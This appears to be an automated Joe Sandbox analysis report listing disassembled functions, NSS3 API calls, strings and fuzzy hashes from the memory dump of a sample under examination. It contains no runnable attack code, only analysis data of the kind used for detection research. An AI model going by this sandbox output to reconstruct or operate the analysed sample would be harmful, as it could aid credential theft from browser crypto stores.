Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: c2f9200e48ceb6b2426dae4048682229e75723923118c7544440fde7ff49c71c
Instruction ID: 5f36dad948f1dd0bdd8bde624d457da6999d068437cfcc33f737bdf758637870
Opcode Fuzzy Hash: c2f9200e48ceb6b2426dae4048682229e75723923118c7544440fde7ff49c71c
Instruction Fuzzy Hash: 3B617DB5E01205ABDB10CF95CC80AABB7B5EF89358F14452CDC19A7740E732A915CAA6

Function 6C578E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C578E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C578E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C578EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6A18D0,?), ref: 6C578F03
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C578F19
PL_FreeArenaPool.NSS3(?), ref: 6C578F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C578F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C578F65
PL_FinishArenaPool.NSS3(?), ref: 6C578FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C578FFE
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C579012
PL_FreeArenaPool.NSS3(?), ref: 6C579024
PL_FinishArenaPool.NSS3(?), ref: 6C57902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C57903E

Strings

security, xrefs: 6C578EE7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 7020fcdd0cc8b796478b2f15710b869c2cc9d4ed616e36b8d9eb349c33dffb6f
Instruction ID: 2d6718290ba3df8de0c418b53f772650b0c92233032d03a2113a960857e3ddfe
Opcode Fuzzy Hash: 7020fcdd0cc8b796478b2f15710b869c2cc9d4ed616e36b8d9eb349c33dffb6f
Instruction Fuzzy Hash: 825138B1608300EBD7209E599C41FAB73A8ABC675CF45082EF855A7B40D731ED498777

Function 6C63CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C63CC7B), ref: 6C63CD7A

Part of subcall function 6C63CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C5AC1A8,?), ref: 6C63CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C63CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C63CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C63CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C63CD8E

Part of subcall function 6C5605C0: PR_EnterMonitor.NSS3 ref: 6C5605D1
Part of subcall function 6C5605C0: PR_ExitMonitor.NSS3 ref: 6C5605EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C63CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C63CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C63CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C63CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C63CE48

Strings

ws2_32.dll, xrefs: 6C63CD75
wship6.dll, xrefs: 6C63CDE3
freeaddrinfo, xrefs: 6C63CD9F, 6C63CE10
getnameinfo, xrefs: 6C63CDB2, 6C63CE23
getaddrinfo, xrefs: 6C63CD88, 6C63CDF9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: e8e769d2293c1de7175b810526c63232790f57063fa2a8c7b03f2492492b72f8
Instruction ID: c37e17fb3c02a4f784044fdeb98fc06aeda509fb12d49ff84802f0dcba497065
Opcode Fuzzy Hash: e8e769d2293c1de7175b810526c63232790f57063fa2a8c7b03f2492492b72f8
Instruction Fuzzy Hash: C411B7F5E1317162D701667B2C4099A38985F9221DF14663AF80BD1F41FB51DA06CAEE

Function 6C681C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C6813BC,?,?,?,6C681193), ref: 6C681C6B
PR_NewLock.NSS3(?,6C681193), ref: 6C681C7E

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PR_NewCondVar.NSS3(00000000,?,6C681193), ref: 6C681C91

Part of subcall function 6C55BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5621BC), ref: 6C55BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C681193), ref: 6C681CA7

Part of subcall function 6C55BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C55BBEB
Part of subcall function 6C55BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C55BBFB
Part of subcall function 6C55BB80: GetLastError.KERNEL32 ref: 6C55BC03
Part of subcall function 6C55BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C55BC19
Part of subcall function 6C55BB80: free.MOZGLUE(00000000), ref: 6C55BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C681193), ref: 6C681CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C681193), ref: 6C681CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C681193), ref: 6C681CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C681193), ref: 6C681D1A

Part of subcall function 6C639BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C561A48), ref: 6C639BB3
Part of subcall function 6C639BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C561A48), ref: 6C639BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C681193), ref: 6C681D3D

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C681193), ref: 6C681D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C681193), ref: 6C681D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C681193), ref: 6C681D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C681193), ref: 6C681D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C681193), ref: 6C681D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C681193), ref: 6C681D93
PR_DestroyLock.NSS3(00000000,?,?,6C681193), ref: 6C681D9F
free.MOZGLUE(00000000,?,6C681193), ref: 6C681DA8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 57ab7475bc8cc658a4029bb59042e3a55dd68338eeed352f08978664d8b2d691
Instruction ID: 5b5d0d38193e2d8e753ef65fb5f687e5793166064e69168943ea0988b8e0fd1d
Opcode Fuzzy Hash: 57ab7475bc8cc658a4029bb59042e3a55dd68338eeed352f08978664d8b2d691
Instruction Fuzzy Hash: 87312BF1E01301ABEB109F25AC41A9776F4AF4275CF040439E85A87F01FB71E818CBAA

Function 6C595E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C595ECF
EnterCriticalSection.KERNEL32(?), ref: 6C595EE3
PR_Unlock.NSS3(?), ref: 6C595F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C595FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C5961F4
S&[l, xrefs: 6C5962E3
S&[l, xrefs: 6C595E6C, 6C59627F, 6C595F12

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&[l$S&[l
API String ID: 2280678669-4247202009
Opcode ID: 7ccff7c44a8c9f22da23457bf0e48e1fda471844aced23f13c122a40bbb46182
Instruction ID: 3dca785185c77a75e32fb79f651dd6d4f454d5add25defd20807c2dfc29dbd6c
Opcode Fuzzy Hash: 7ccff7c44a8c9f22da23457bf0e48e1fda471844aced23f13c122a40bbb46182
Instruction Fuzzy Hash: DBF1F5B5A00215CFDB44CF19C984B86BBF4FF49304F5582AAD8089B746E774EA98CF91

Function 6C5E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,^l), ref: 6C5E0C81

Part of subcall function 6C5CBE30: SECOID_FindOID_Util.NSS3(6C58311B,00000000,?,6C58311B,?), ref: 6C5CBE44

Part of subcall function 6C5B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C5B95DC,00000000,00000000,00000000,?,6C5B95DC,00000000,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5B8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5E0CC4

Part of subcall function 6C5CFAB0: free.MOZGLUE(?,-00000001,?,?,6C56F673,00000000,00000000), ref: 6C5CFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5E0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C5E0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C5E0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C5E0D7D
free.MOZGLUE(00000000), ref: 6C5E0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5E0DC1
free.MOZGLUE(00000000), ref: 6C5E0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5E0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5E0E0F

Part of subcall function 6C5B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5B95E0
Part of subcall function 6C5B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5B95F5
Part of subcall function 6C5B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C5B9609
Part of subcall function 6C5B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5B961D
Part of subcall function 6C5B95C0: PK11_GetInternalSlot.NSS3 ref: 6C5B970B
Part of subcall function 6C5B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C5B9756
Part of subcall function 6C5B95C0: PK11_GetIVLength.NSS3(?), ref: 6C5B9767
Part of subcall function 6C5B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C5B977E
Part of subcall function 6C5B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5B978E

Strings

-$^l, xrefs: 6C5E0C64
*,^l, xrefs: 6C5E0DCC
*,^l, xrefs: 6C5E0C69, 6C5E0DE0, 6C5E0C80, 6C5E0C8B, 6C5E0CAF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,^l$*,^l$-$^l
API String ID: 3136566230-2728749200
Opcode ID: 7b5d7340f437d201eeb13f498f3b253eec7bbcde1b410cceefa7165d3cbbb96c
Instruction ID: f29c81bd06add65fd82f978b6f5ef535d44472fdcd7a2ff1ed06737a24d103fb
Opcode Fuzzy Hash: 7b5d7340f437d201eeb13f498f3b253eec7bbcde1b410cceefa7165d3cbbb96c
Instruction Fuzzy Hash: 494115B1900245ABEB009F65DD81BAF7A74EF8430CF040129ED1967741EB75EE14CBE2

Function 6C5D5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C5D5EC0,00000000,?,?), ref: 6C5D5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C5D5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C5D5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C5D5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C5D5EC0,00000000,?,?), ref: 6C5D5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C5D5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C5D5D80

Strings

multiaccess:, xrefs: 6C5D5CB8
dbm:, xrefs: 6C5D5D03, 6C5D5D60
NSS_DEFAULT_DB_TYPE, xrefs: 6C5D5D1A
extern:, xrefs: 6C5D5CEA, 6C5D5D4B
sql:, xrefs: 6C5D5CD1, 6C5D5D36

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 7efae66136ab6a6b1066d774d3cc31129b7cdb72ed053ce74b896c9ccc1facaa
Instruction ID: cb442d0fc7a6e4ce484f662f67f558de3c1ef881d5c9ae864dfb1f37ced29eb2
Opcode Fuzzy Hash: 7efae66136ab6a6b1066d774d3cc31129b7cdb72ed053ce74b896c9ccc1facaa
Instruction Fuzzy Hash: 393108F07423016BE7006E2D9C9CB663368EF16249F650430ED56E6A82E771E712C7BD

Function 6C5D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C6A1DE0,?), ref: 6C5D6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C5D6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C5D6D82
DER_GetInteger_Util.NSS3(?), ref: 6C5D6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5D6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C5D6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C5D6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C5D6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C5D6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5D7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C5D7033
free.MOZGLUE(?), ref: 6C5D703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C5D7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C5D7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C5D70AF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 8db287575ffa87776aa96857d9c50380ae70af756704429c22d3be33bbf317eb
Instruction ID: 90375bfd09832e4e5b54f9f313681f7ae583ec0342fac707e47ca686bd19fd67
Opcode Fuzzy Hash: 8db287575ffa87776aa96857d9c50380ae70af756704429c22d3be33bbf317eb
Instruction Fuzzy Hash: D3A109715083029BEB009F2CDC45B5B32A4DB8130CF264D39E959CBB95EB75F8468B9B

Function 6C59AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59AF39
PR_Unlock.NSS3(?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59AF69
TlsGetValue.KERNEL32 ref: 6C59B06B
EnterCriticalSection.KERNEL32(?), ref: 6C59B083
PR_Unlock.NSS3(?), ref: 6C59B0A4
TlsGetValue.KERNEL32 ref: 6C59B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C59B0D9
PR_Unlock.NSS3 ref: 6C59B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59B182

Part of subcall function 6C5CFAB0: free.MOZGLUE(?,-00000001,?,?,6C56F673,00000000,00000000), ref: 6C5CFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C59B177

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C57AB95,00000000,?,00000000,00000000,00000000), ref: 6C59B1C2

Part of subcall function 6C5C1560: TlsGetValue.KERNEL32(00000000,?,6C590844,?), ref: 6C5C157A
Part of subcall function 6C5C1560: EnterCriticalSection.KERNEL32(?,?,?,6C590844,?), ref: 6C5C158F
Part of subcall function 6C5C1560: PR_Unlock.NSS3(?,?,?,?,6C590844,?), ref: 6C5C15B2

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 25136d91d9f0a1ebc26991cb5e144abc52100063e73d4fb3f9d767a6f70922c0
Instruction ID: 58ac0f4f35fe5227bc3edf8c24b3cf57c5dd10224521d184e9783ffc74bbab97
Opcode Fuzzy Hash: 25136d91d9f0a1ebc26991cb5e144abc52100063e73d4fb3f9d767a6f70922c0
Instruction Fuzzy Hash: B0A1D1B5E00245EBEF00AF64DC81AEEB7B4EF45308F144168E805A7751EB31E999CBA5

Function 6C592C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?Yl,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592C62
EnterCriticalSection.KERNEL32(0000001C,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592C76
PL_HashTableLookup.NSS3(00000000,?,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592C93

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23,?), ref: 6C592CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?,?,6C593F23), ref: 6C592CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?), ref: 6C592CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C58E477,?,?,?,00000001,00000000,?), ref: 6C592D4D
EnterCriticalSection.KERNEL32(?), ref: 6C592D61
PL_HashTableLookup.NSS3(?,?), ref: 6C592D71
PR_Unlock.NSS3(?), ref: 6C592D7E

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

Strings

#?Yl, xrefs: 6C592C43

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

